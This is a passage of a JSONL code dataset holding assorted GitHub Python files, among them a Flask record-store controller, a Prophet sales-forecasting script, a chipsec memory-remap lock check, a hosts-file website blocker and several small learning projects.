len(h)):\n settings.setArrayIndex(i)\n settings.setValue(\"glob\", h[i][0])\n settings.setValue(\"launcher\", h[i][1])\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n settings.endArray()\n return\n\n","repo_name":"inmatarian/qhtpicker","sub_path":"qhtpicker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"11689427560","text":"from flask import render_template, request, redirect\nfrom flask import Blueprint\nfrom models.album import Album\nimport repositories.album_repository as album_repository\nimport repositories.artist_repository as artist_repository\n\nalbums_blueprint = Blueprint(\"albums\", __name__)\n\n@albums_blueprint.route(\"/\")\ndef homepage():\n albums = album_repository.select_all()\n total_albums_in_stock = album_repository.total_albums_in_stock(albums)\n total_spend_on_stock = album_repository.total_spend_on_stock(albums)\n stock_alerts = False\n for album in albums:\n if album.stock_qty <= 3:\n stock_alerts = True\n break\n return render_template(\"/index.html\", albums = albums, total_albums_in_stock = total_albums_in_stock, total_spend_on_stock = total_spend_on_stock, stock_alerts = stock_alerts)\n\n@albums_blueprint.route(\"/albums\")\ndef albums():\n albums = album_repository.select_all()\n return render_template(\"albums/index.html\", albums = albums)\n\n@albums_blueprint.route(\"/albums/new\")\ndef new_album():\n artists = artist_repository.select_all()\n return render_template(\"/albums/new.html\", artists = artists)\n\n@albums_blueprint.route(\"/albums\", methods=[\"POST\"])\ndef create_album():\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price)\n album_repository.save(album)\n return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums/\", methods = [\"GET\"])\ndef show_album(id):\n album = album_repository.select(id)\n return render_template(\"albums/album.html\", album = album)\n\n@albums_blueprint.route(\"/albums//edit\")\ndef edit_album(id):\n album = album_repository.select(id)\n artists = artist_repository.select_all()\n return render_template(\"albums/edit.html\", album = album, artists = artists)\n\n@albums_blueprint.route(\"/albums/\", methods=[\"POST\"])\ndef update_album(id):\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price, id)\n album_repository.update(album)\n return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums//delete\", methods=[\"POST\"])\ndef delete_album(id):\n album_repository.delete(id)\n return redirect (\"/albums\")\n","repo_name":"LaurenLingham/record_store","sub_path":"controllers/album_controller.py","file_name":"album_controller.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"2179231150","text":"import bingo_add\npeople=100\nsum=0\nfor i in range(1000):\n\tsum+=bingo_add.bingo(people)\n\nstring_num=str((sum/1000.0))\n\nprint (\"Meso oros arithmon mexri to BINGO :\")+string_num\n\n","repo_name":"milosmatic1513/Python-Projects","sub_path":"bingo_ergasia1/bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32440450784","text":"from django.test import TestCase\nimport pytest\nfrom .serializers import ProfileSerializer\nfrom .models import Profile\nimport logging\n\n@pytest.mark.django_db\ndef test_profile_serializer():\n # Create a test profile object\n profile = Profile.objects.create(\n name='John Doe',\n bio='Test bio',\n skills='Test skills',\n work_experience='Test work experience',\n hobbies='Test hobbies'\n )\n\n # Serialize the profile object\n serializer = ProfileSerializer(instance=profile)\n logging.info('This is an serializer ', serializer)\n # Ensure the serialized data matches the expected values\n assert serializer.data['name'] == 'John Doe'\n assert serializer.data['bio'] == 'Test bio'\n assert serializer.data['skills'] == 'Test skills'\n assert serializer.data['work_experience'] == 'Test work experience'\n assert serializer.data['hobbies'] == 'Test hobbies'\n\n","repo_name":"raghulvuedata/djangoPortfolio","sub_path":"portfolio/profiles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70388977323","text":"from prettytable import PrettyTable\r\n\r\n#with open(\"C:\\\\Users\\\\USER\\\\error_message.csv\",\"r\")as csvfile:\r\n #csvf=csvfile.readlines()\r\n #lines=csvf[0]\r\n #newline=lines.split(\",\")\r\n #s=PrettyTable([newline[0],newline[1]])\r\n #for r in range(1,len(csvf)):\r\n #rr=csvf[r].split(\",\")\r\n #s.add_row([rr[0],rr[1]])\r\n #html_code=s.get_html_string()\r\n #html_file=open(\"C:\\\\Users\\\\USER\\\\html_script.html\",\"w\")\r\n #html_file=html_file.write(html_code)\r\n\r\n\r\nwith open(\"C:\\\\Users\\\\USER\\\\user_statistics.csv\",\"r\") as usercsv:\r\n us=usercsv.readlines()\r\n line=us[0]\r\n lines=line.split(\",\")\r\n D=PrettyTable([lines[0] ,lines[1] ,lines[2]])\r\n for e in range(1,len(us)):\r\n new=us[e].split(\",\")\r\n D.add_row([new[0],new[1],new[2]])\r\n stats_html_code=D.get_html_string()\r\n stats_file=open(\"C:\\\\Users\\\\USER\\\\user_statistics.html\",\"w\")\r\n stats_file=stats_file.write(stats_html_code)","repo_name":"EmperorDa8/random-scripts","sub_path":"csv to html.py","file_name":"csv to html.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"72191022124","text":"import pandas as pd\nfrom fbprophet import Prophet\nimport numpy as np\nimport pyodbc\nimport os\n\n\ndef forecasting():\n restaurant_id = input('geben sie eine RestaurantID an:')\n name_csv = str(input('geben sie den Namen der Zieldatei an: (z.B. restaurant.csv)'))\n column_date = str(input('Name der Spalte mit dem Datum:'))\n column_product_name = str(input('Name der Spalte mit den Produktnamen:'))\n column_quantity = str(input('Name der Spalte mit der Quantity:'))\n column_sold_products = str(input('Name der Spalte mit der Anzahl der verkauften Produkte:'))\n data_path = \"../data\"\n data = pd.read_csv(os.path.join(data_path, name_csv))\n\n data_ts = data[[column_date, column_product_name, column_quantity, column_sold_products]]\n data_ts = data_ts.dropna()\n\n # change to datetime\n data_ts[column_date] = pd.to_datetime(data_ts[column_date])\n data_ts[column_date] = pd.to_datetime(data_ts[column_date], format='%Y%m%d')\n\n data_grouped = data_ts.groupby([column_product_name])[column_sold_products, column_quantity].sum()\n # data_grouped.tail(100)\n\n # get the top 10 most sold products\n top_ten = data_grouped.sort_values(by=str(column_sold_products), ascending=False).head(10)\n top_ten_list = top_ten.index.tolist()\n\n # connect to Database\n connection_string = (\n 'DRIVER=MySQL ODBC 8.0 ANSI Driver;'\n 'SERVER=localhost;'\n 'DATABASE=restaurant_products;'\n 'UID=root;'\n 'PWD=1234;'\n 'charset=utf8mb4;'\n )\n\n conn = pyodbc.connect(connection_string)\n\n def execute(command):\n cursor = conn.cursor()\n cursor.execute(command)\n cursor.commit()\n\n # inserts the forecasting into the database\n def predict(restaurantID, date, quantity, min_quantity, max_quantity, item):\n command = 'insert into prediction (restaurantId,datum,quantity,max_quantity,min_quantity, product_name) values (\"' + str(\n restaurantID) + '\", \"' + str(date) + '\",' + str(quantity) + ',' + str(min_quantity) + ',' + str(\n max_quantity) + ',\"' + str(item) + '\");'\n # print(command)\n execute(command)\n\n for item in top_ten_list:\n is_item = data_ts[column_product_name] == item\n data_item = data_ts[is_item]\n data_item[column_date] = pd.to_datetime(data_item[column_date].dt.strftime('%Y-%m-%d'))\n data_item_grouped = data_item.groupby([column_date])[column_sold_products].sum()\n date = data_item_grouped.index.tolist()\n df_data_item_grouped = data_item_grouped.to_frame()\n # print(date)\n df_data_item_grouped['Datum'] = date\n # data_item_grouped['Order Date'] = data_item_grouped.index\n df_data_item_grouped.reset_index(drop=True, inplace=True)\n\n df_data_item_grouped.rename(columns={'Datum': 'ds', column_sold_products: 'y'}, inplace=True)\n list = df_data_item_grouped['y']\n df_data_item_grouped.pop('y')\n df_data_item_grouped['y'] = list\n\n m = Prophet()\n m.fit(df_data_item_grouped)\n\n future_week = m.make_future_dataframe(periods=7)\n future_week.tail(7)\n\n forecast_week = m.predict(future_week)\n\n print(forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7))\n\n prediction_seven_days_df = forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7)\n\n for index, rows in prediction_seven_days_df.iterrows():\n date = rows['ds']\n quantity = rows['yhat']\n min_quantity = rows['yhat_lower']\n max_quantity = rows['yhat_upper']\n\n predict(restaurant_id, date, quantity, max_quantity, min_quantity, 
item)\n\n\nforecasting()\n","repo_name":"BennerLukas/takeawaste","sub_path":"test/deprecated/forecasting_function.py","file_name":"forecasting_function.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"2085557282","text":"from chipsec.module_common import BaseModule, ModuleResult, MTAG_HWCONFIG, MTAG_SMM\nfrom chipsec.defines import BIT32, ALIGNED_1MB\n\n_MODULE_NAME = 'remap'\n\nTAGS = [MTAG_SMM, MTAG_HWCONFIG]\n\n\n_REMAP_ADDR_MASK = 0x7FFFF00000\n_TOLUD_MASK = 0xFFFFF000\n\n\nclass remap(BaseModule):\n\n def __init__(self):\n BaseModule.__init__(self)\n self.rc_res = ModuleResult(0x43aa254, 'https://chipsec.github.io/modules/chipsec.modules.common.remap.html')\n\n def is_supported(self) -> bool:\n if self.cs.is_core():\n rbase_exist = self.cs.is_register_defined('PCI0.0.0_REMAPBASE')\n rlimit_exist = self.cs.is_register_defined('PCI0.0.0_REMAPLIMIT')\n touud_exist = self.cs.is_register_defined('PCI0.0.0_TOUUD')\n tolud_exist = self.cs.is_register_defined('PCI0.0.0_TOLUD')\n tseg_exist = self.cs.is_register_defined('PCI0.0.0_TSEGMB')\n if rbase_exist and rlimit_exist and touud_exist and tolud_exist and tseg_exist:\n return True\n self.logger.log_important('Required register definitions not defined for platform. Skipping module.')\n else:\n self.logger.log_important('Not a Core (client) platform. Skipping module.')\n\n self.rc_res.setStatusBit(self.rc_res.status.NOT_APPLICABLE)\n self.res = self.rc_res.getReturnCode(ModuleResult.NOTAPPLICABLE)\n return False\n\n def is_ibecc_enabled(self) -> bool:\n if self.cs.is_register_defined('IBECC_ACTIVATE'):\n edsr = self.cs.read_register_field('IBECC_ACTIVATE', 'IBECC_EN')\n if edsr == 1:\n return True\n else:\n self.logger.log_verbose('IBECC is not enabled!')\n else:\n self.logger.log_verbose('IBECC is not defined!')\n return False\n\n def check_remap_config(self) -> int:\n is_warning = False\n\n remapbase = self.cs.read_register('PCI0.0.0_REMAPBASE')\n remaplimit = self.cs.read_register('PCI0.0.0_REMAPLIMIT')\n touud = self.cs.read_register('PCI0.0.0_TOUUD')\n tolud = self.cs.read_register('PCI0.0.0_TOLUD')\n tsegmb = self.cs.read_register('PCI0.0.0_TSEGMB')\n self.logger.log(\"[*] Registers:\")\n self.logger.log(f\"[*] TOUUD : 0x{touud:016X}\")\n self.logger.log(f\"[*] REMAPLIMIT: 0x{remaplimit:016X}\")\n self.logger.log(f\"[*] REMAPBASE : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] TOLUD : 0x{tolud:08X}\")\n self.logger.log(f\"[*] TSEGMB : 0x{tsegmb:08X}\")\n self.logger.log(\"\")\n\n ia_untrusted = 0\n if self.cs.register_has_field('MSR_BIOS_DONE', 'IA_UNTRUSTED'):\n ia_untrusted = self.cs.read_register_field('MSR_BIOS_DONE', 'IA_UNTRUSTED')\n remapbase_lock = remapbase & 0x1\n remaplimit_lock = remaplimit & 0x1\n touud_lock = touud & 0x1\n tolud_lock = tolud & 0x1\n remapbase &= _REMAP_ADDR_MASK\n remaplimit &= _REMAP_ADDR_MASK\n touud &= _REMAP_ADDR_MASK\n tolud &= _TOLUD_MASK\n tsegmb &= _TOLUD_MASK\n self.logger.log(\"[*] Memory Map:\")\n self.logger.log(f\"[*] Top Of Upper Memory: 0x{touud:016X}\")\n self.logger.log(f\"[*] Remap Limit Address: 0x{(remaplimit | 0xFFFFF):016X}\")\n self.logger.log(f\"[*] Remap Base Address : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] 4GB : 0x{BIT32:016X}\")\n self.logger.log(f\"[*] Top Of Low Memory : 0x{tolud:016X}\")\n self.logger.log(f\"[*] TSEG (SMRAM) Base : 0x{tsegmb:016X}\")\n self.logger.log('')\n\n remap_ok = True\n\n self.logger.log(\"[*] Checking memory remap configuration..\")\n\n if remapbase == remaplimit:\n self.logger.log(\"[!] 
Memory Remap status is Unknown\")\n is_warning = True\n elif remapbase > remaplimit:\n self.logger.log(\"[*] Memory Remap is disabled\")\n else:\n self.logger.log(\"[*] Memory Remap is enabled\")\n remaplimit_addr = (remaplimit | 0xFFFFF)\n if self.is_ibecc_enabled():\n ok = (remaplimit_addr > touud) and (remapbase < touud)\n else:\n ok = ((remaplimit_addr + 1) == touud)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" Remap window configuration is correct: REMAPBASE <= REMAPLIMIT < TOUUD\")\n else:\n self.logger.log_bad(\" Remap window configuration is not correct\")\n\n ok = (0 == tolud & ALIGNED_1MB) and \\\n (0 == touud & ALIGNED_1MB) and \\\n (0 == remapbase & ALIGNED_1MB) and \\\n (0 == remaplimit & ALIGNED_1MB)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" All addresses are 1MB aligned\")\n else:\n self.logger.log_bad(\" Not all addresses are 1MB aligned\")\n\n self.logger.log(\"[*] Checking if memory remap configuration is locked..\")\n ok = (0 != touud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOUUD is locked\")\n else:\n self.logger.log_bad(\" TOUUD is not locked\")\n\n ok = (0 != tolud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOLUD is locked\")\n else:\n self.logger.log_bad(\" TOLUD is not locked\")\n\n ok = ((0 != remapbase_lock) and (0 != remaplimit_lock)) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" REMAPBASE and REMAPLIMIT are locked\")\n else:\n self.logger.log_bad(\" REMAPBASE and REMAPLIMIT are not locked\")\n\n if remap_ok:\n if is_warning:\n self.logger.log_warning(\"Most Memory Remap registers are configured correctly and locked\")\n self.logger.log(\"[!] Manual verification of REMAP BASE and LIMIT register values may be needed.\")\n res = ModuleResult.WARNING\n self.rc_res.setStatusBit(self.rc_res.status.VERIFY)\n else:\n res = ModuleResult.PASSED\n self.rc_res.setStatusBit(self.rc_res.status.SUCCESS)\n self.logger.log_passed(\"Memory Remap is configured correctly and locked\")\n else:\n res = ModuleResult.FAILED\n self.rc_res.setStatusBit(self.rc_res.status.CONFIGURATION)\n self.rc_res.setStatusBit(self.rc_res.status.LOCKS)\n self.logger.log_failed(\"Memory Remap is not properly configured/locked. Remaping attack may be possible\")\n\n return self.rc_res.getReturnCode(res)\n\n\n # --------------------------------------------------------------------------\n # run( module_argv )\n # Required function: run here all tests from this module\n # --------------------------------------------------------------------------\n def run(self, _) -> int:\n self.logger.start_test(\"Memory Remapping Configuration\")\n\n self.res = self.check_remap_config()\n return self.res\n","repo_name":"chipsec/chipsec","sub_path":"chipsec/modules/common/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":2755,"dataset":"github-code","pt":"19"}
+{"seq_id":"43580235744","text":"class BitmapFile:\n def __init__(self, data):\n self.size = self.sumBytes(data[2:6])\n self.start = self.sumBytes(data[10:14])\n self.width = self.sumBytes(data[18:22])\n self.height = self.sumBytes(data[22:26])\n self.depth = self.sumBytes(data[28:30])\n self.bpp = self.depth // 8\n #self.head = data[0:self.start]\n #self.data = data[self.start:self.size]\n self.data = data\n\n def sumBytes(self, d):\n byteSum = 0\n for i in range(len(d)):\n byteSum += (\n (d[i] % 16) * 16**(i*2) +\n (d[i] // 16) * 16**(i*2 + 1)\n )\n return byteSum\n\n def makeFile(self, filePath):\n with open(filePath, \"wb\") as f:\n f.write(self.data)\n\n def findPixelIndex(self, x, y):\n return self.start + x * self.bpp + y * self.width * self.bpp\n","repo_name":"borkess/afis","sub_path":"BitmapFile.py","file_name":"BitmapFile.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31300617090","text":"import time\nfrom datetime import datetime as dt\n\nhosts_path = r\"C:\\Users\\Vishnu's World\\Desktop\\app3\\hosts\"\nredirect = \"127.0.0.1\"\nwebsite_list = [\"www.facebook.com\",\"facebook.com\",\"www.flipkart.com\",\"www.amazon.in\"]\n\nwhile True:\n if dt(dt.now().year,dt.now().month,dt.now().day,9)>dt.now()>=dt(dt.now().year,dt.now().month,dt.now().day,3):\n print (\"College...\")\n with open(hosts_path,'r+')as file:\n content = file.read()\n for website in website_list:\n if website in content:\n pass\n else:\n file.write(redirect+\"\"+website)\n else:\n with open(hosts_path,'r+') as file:\n content = file.readlines()\n file.seek(0)\n for line in content:\n if not any(website in content for website in website_list):\n file.write(line)\n file.truncate()\n print (\"study...\")\n time.sleep (5)\n","repo_name":"vishnuvryeruva/Website-Blocker","sub_path":"Website_blocker.pyw","file_name":"Website_blocker.pyw","file_ext":"pyw","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2485307424","text":"import time\nimport matplotlib.pyplot as plt\nfrom typing import Callable\n\nfrom myio import getRandomMatrix\n\n\ndef benchmark(mul_func: Callable, sizes: list) -> list:\n res_times = []\n temp_times = []\n const_measures = 2\n\n for i in range(len(sizes)):\n left_matrix = getRandomMatrix(sizes[i], sizes[i])\n right_matrix = getRandomMatrix(sizes[i], sizes[i])\n for j in range(const_measures):\n start_time = time.time()\n mul_func(left_matrix, right_matrix)\n end_time = time.time() - start_time\n\n temp_times.append(end_time)\n\n res_times.append(sum(temp_times) / const_measures)\n temp_times.clear()\n\n print(res_times)\n\n return res_times\n\n\ndef plot_graph(mul_funcs: list, sizes: list) -> None:\n # General settings\n plt.title(\"Сложность алгоритмов умножения матриц\")\n plt.xlabel(\"Размер\")\n plt.ylabel(\"Время, сек\")\n plt.grid()\n\n # Collecting values\n for mul_func in mul_funcs:\n times = benchmark(mul_func, sizes)\n mul_name = str(mul_func).split()[1]\n if mul_name == \"defaultMatrixMul\":\n mul_name = \"Простой\"\n elif mul_name == \"vinMatrixMul\":\n mul_name = \"Виноград\"\n elif mul_name == \"optimizedVinMatrixMul\":\n mul_name = \"Виноград с оптимизациями\"\n plt.plot(sizes, times, label=mul_name)\n\n # Image of the results obtained\n plt.legend()\n plt.show()","repo_name":"Untouchabl3Pineapple/iu7-aa","sub_path":"lab_02/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"73023939244","text":"#!/usr/bin/env/python\n# -*- coding: utf-8 -*-\n\nfrom Tkinter import * #importa a bibioteca do TKinter\n\ndef donothing():\n print ('IT WORKED')\n\nroot = Tk() #cria a aplicação raiz. \nroot.title(string=\"..:: CALCULADORA ::..\")\n\nframe1 = Frame(root)\n#frame1.pack(side=TOP, fill=X)\nframe1.grid()\n\nframe2 = Frame(root)\n#frame2.pack(side=RIGHT, fill=X)\nframe2.grid()\nmainmenu = Menu(frame1)\nroot.config(menu=mainmenu)\n\nsubmenu=Menu(mainmenu)\nmainmenu.add_cascade(label='File',menu=submenu)\nsubmenu.add_command(label='Open', command=donothing)\nsubmenu.add_separator()\nsubmenu.add_command(label='Exit', command=frame1.quit)\n\n\nw = Label(frame1, text=\"Teste TKinter!\") #cria um label com o texto especificado\n#w.pack()\nw.grid(column=0,row=0) #insere na tela\nbtn = Button(frame1, text=\"Olá\", cursor=\"hand2\")\n#btn.pack()\nbtn.grid(column=0,row=1)\nbtn2 = Button(frame2, text=\"Hello\", cursor=\"umbrella\")\n#btn2.pack()\nbtn2.grid(column=0,row=0)\nbtn3 = Button(frame2, text=\"Hallo\", cursor=\"sailboat\")\n#btn3.pack()\nbtn3.grid(column=1,row=0)\n#from Tkinter import ttk\n#ttk.Button(root, text=\"Hello World\").grid() #Cria botão\nroot.mainloop() #inicializa o loop","repo_name":"brunocozendey/100DaysChallenge","sub_path":"python/tkinter-teste.py","file_name":"tkinter-teste.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37196489068","text":"#! /usr/bin/env python3\r\n# coding: utf-8\r\n\r\n\"\"\"This script starts mc Guyver labyrinth\r\nparameter is :\r\n file_name (discribing map).\"\"\"\r\nfrom core.gamemanager import DisplayManager\r\nfrom core.mapgame import MapGame\r\nfrom core import utils\r\nfrom core import constant\r\nfrom tkinter import messagebox, Tk\r\nimport logging as lg\r\n\r\nlogger = lg.getLogger(__name__)\r\n\r\nMODULE_DAL_PATH = 'core/dal'\r\n\r\n\r\ndef main():\r\n \"\"\"Main entry no parameter.\"\"\"\r\n args = utils.parse_arguments()\r\n # prepare les logs\r\n utils.set_logger()\r\n # lit le fichier map\r\n map_game = MapGame(args.datafile)\r\n lg.info('Map description loaded: %s', map_game.path_name)\r\n interface_type = args.interface\r\n lg.info('Display interface : %s', args.interface)\r\n\r\n # implementation Text or Graphic\r\n display = utils.build_display(MODULE_DAL_PATH, interface_type)\r\n\r\n # get Pygame windows\r\n fenetre = display.init(map_game)\r\n lg.info('%s env set : %s', args.interface, map_game.path_name)\r\n\r\n # set display manager : intialize items and persos\r\n game_manager = DisplayManager(display, fenetre, map_game)\r\n\r\n # dispatch item and perso (mcGyver, guard, needle, ether, tube)\r\n game_manager.dispatch_items()\r\n lg.info('Dispatch items set')\r\n\r\n # main loop\r\n continuer = 1\r\n\r\n while continuer:\r\n\r\n game_manager.draw()\r\n\r\n for event in display.event_get():\r\n # Boucle event\r\n if event is None:\r\n continue\r\n\r\n if display.event_quit(event) is True:\r\n continuer = 0\r\n elif display.event_keydown_escape(event) is True:\r\n continuer = 0\r\n elif display.event_keydown_right(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'droite')\r\n elif display.event_keydown_left(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'gauche')\r\n elif display.event_keydown_up(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'haut')\r\n elif display.event_keydown_down(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'bas')\r\n\r\n # check items\r\n if game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_GARDIEN):\r\n lg.info('On rencontre le garde ')\r\n if game_manager.is_completed():\r\n game_manager.exclude_item(constant.ID_GARDIEN, 4)\r\n lg.info('Ok Garde endormi ')\r\n else:\r\n lg.info('You loose !')\r\n Tk().wm_withdraw()\r\n messagebox.showinfo('Oups', 'You loose !')\r\n continuer = 0\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_AIGUILLE):\r\n lg.info('On rencontre l\\'aiguille ')\r\n game_manager.collect_item(constant.ID_AIGUILLE)\r\n game_manager.exclude_item(constant.ID_AIGUILLE, 0)\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_ETHER):\r\n lg.info('On rencontre la bouteille d\\'ether ')\r\n game_manager.collect_item(constant.ID_ETHER)\r\n game_manager.exclude_item(constant.ID_ETHER, 1)\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_TUBE):\r\n lg.info('On rencontre le tube ')\r\n game_manager.collect_item(constant.ID_TUBE)\r\n game_manager.exclude_item(constant.ID_TUBE, 2)\r\n\r\n elif game_manager.is_exit(constant.ID_MCGYVER):\r\n if game_manager.is_completed():\r\n lg.info('You win !')\r\n # on redessine une derniere fois la fenetre du jeu\r\n game_manager.draw()\r\n Tk().wm_withdraw()\r\n messagebox.showinfo('Congratulations', 'You win !')\r\n continuer = 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
main()\r\n","repo_name":"jean-charles-gibier/macgyver","sub_path":"macgyver.py","file_name":"macgyver.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38003879286","text":"# python 3\nfrom trees.tree_basics import Node\n\n\ndef build_tree(inorder, postorder, n):\n if not inorder:\n return\n\n root = Node(postorder[-1])\n index = inorder.index(root.data)\n\n new_inorder_left = inorder[:index]\n new_inorder_right = inorder[index + 1:]\n\n new_postorder_left = postorder[:index]\n new_postorder_right = postorder[index:len(postorder) - 1]\n\n root.left = build_tree(new_inorder_left, new_postorder_left, n)\n root.right = build_tree(new_inorder_right, new_postorder_right, n)\n\n return root\n\n\ndef main():\n inorder = [4, 8, 2, 5, 1, 6, 3, 7]\n postorder = [8, 4, 5, 2, 6, 7, 3, 1]\n build_tree(inorder, postorder, len(postorder))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HJ1X/dsa-450","sub_path":"trees/Construct tree/construct_tree_from_in_and_post_order.py","file_name":"construct_tree_from_in_and_post_order.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"25958911853","text":"\"\"\"Test HTTP capabilities of the core's frontend.\"\"\"\n\nfrom ppp_libmodule.tests import PPPTestCase\nfrom ppp_core import app\n\nclass HttpTest(PPPTestCase(app)):\n config_var = 'PPP_CORE_CONFIG'\n config = \"\"\"\n {\n \"debug\": true,\n \"modules\": []\n }\n \"\"\"\n def testPostOnly(self):\n self.assertEqual(self.app.get('/', status='*').status_int, 405)\n self.assertEqual(self.app.put('/', status='*').status_int, 405)\n def testNotRoot(self):\n self.assertEqual(self.app.post_json('/foo', {}, status='*').status_int, 400)\n def testNotJson(self):\n self.assertEqual(self.app.post('/', 'foobar', status='*').status_int, 400)\n def testWorking(self):\n q = {'id': '1', 'language': 'en', 'tree': {'type': 'triple',\n 'subject': {'type': 'resource', 'value': 'foo'},\n 'predicate': {'type': 'resource', 'value': 'bar'},\n 'object': {'type': 'resource', 'value': 'baz'}},\n 'measures': {}, 'trace': []}\n self.assertResponse(q, [])\n def testNoTree(self):\n q = {'language': 'en'}\n self.assertStatusInt(q, 400)\n","repo_name":"ProjetPP/PPP-Core","sub_path":"tests/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
+{"seq_id":"673259033","text":"\"\"\"Example dynamic models.\"\"\"\n\nimport abc\nfrom typing import Callable, Tuple\n\nimport numpy as np\nfrom scipy import constants, integrate\n\n\nclass ContinuousDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Continuous-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement differential equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Time derivative of state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t: float, x: np.ndarray) -> np.ndarray:\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: np.ndarray,\n u: Callable[[float], np.ndarray],\n **kwargs,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model using numerical integration.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : Callable[[float], np.ndarray]\n Input function of time.\n **kwargs : dict\n Keyword arguments for :func:`integrate.solve_ivp`.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. Each timestep is one row.\n \"\"\"\n sol = integrate.solve_ivp(\n lambda t, x: self.f(t, x, u(t)),\n t_range,\n x0,\n t_eval=np.arange(*t_range, t_step),\n **kwargs,\n )\n return (sol.t, sol.y.T)\n\n\nclass DiscreteDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Discrete-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement next-state equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Next state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t, x):\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: 